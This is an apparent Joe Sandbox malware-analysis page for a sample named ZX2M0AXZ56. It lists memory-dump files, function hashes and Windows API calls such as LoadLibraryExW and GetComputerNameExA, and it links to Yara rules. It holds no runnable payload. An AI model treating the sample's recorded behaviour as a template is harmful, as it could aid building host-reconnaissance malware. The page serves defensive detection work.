Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 9616ea72f6443b18c06c3bfad8f864893d76e17fd4f996b22653e2c81c5b4a4a
Instruction ID: 41d1bb8d2466b5d0f95f55bde1fd108c34e0252f96e1d4fcb65dbc32e0416686
Opcode Fuzzy Hash: 9616ea72f6443b18c06c3bfad8f864893d76e17fd4f996b22653e2c81c5b4a4a
Instruction Fuzzy Hash: 5031FF755083088BD714DF58D8C267FBBE4EBC5324F14892DEA9883391D339D848CB9A

Function 004F0460 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39dd1d21955a23c6544b092c51cd6c4d6b31326a1f7ac9aff9d761a375eb731f
Instruction ID: 472865145182a5877d3eb21e260898bd3ad0bfa495d93f6b18632aed5d45cb43
Opcode Fuzzy Hash: 39dd1d21955a23c6544b092c51cd6c4d6b31326a1f7ac9aff9d761a375eb731f
Instruction Fuzzy Hash: A76115756043059BE7159F18C89063FB3A2EBC5721F19C52EEA858B392EB34DC61C78A

Function 004BCC7A Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 27fa3c63ba8b7a28502bd8c28cad7685a82659ea1307d8575776d91aa413f7c5
Instruction ID: 4b737a7ceb989c2a83331d1afa1066a3f279450a83adde2391a874455532bf86
Opcode Fuzzy Hash: 27fa3c63ba8b7a28502bd8c28cad7685a82659ea1307d8575776d91aa413f7c5
Instruction Fuzzy Hash: 9631E6E9F001405BE9057A3368A3ABF615B4BD171CF08142EF50A26383ED6DB91695AF

Function 004B9D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000), ref: 004B9D98
LoadLibraryExW.KERNEL32(?,00000000), ref: 004B9E78

Strings

CKT, xrefs: 004B9E85

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: LibraryLoad
String ID: CKT
API String ID: 1029625771-4061587880
Opcode ID: 620d0e6b3f78addb9619954eb89257dcbcce22e62936c04f925a68af00c9eb1d
Instruction ID: 0f9ae2bf61728c63f04045a6e03aca7e3e0a45b2c95fcbab013fd664ad643304
Opcode Fuzzy Hash: 620d0e6b3f78addb9619954eb89257dcbcce22e62936c04f925a68af00c9eb1d
Instruction Fuzzy Hash: 114122B4E003409FE7149F789CC2A9A7F71EB06324F41429DD5902F3A2C735981ACBE6

Function 004DD7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 004DD898
GetComputerNameExA.KERNEL32(00000006,?,?), ref: 004DDC43

Strings

;87>, xrefs: 004DDBEB

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
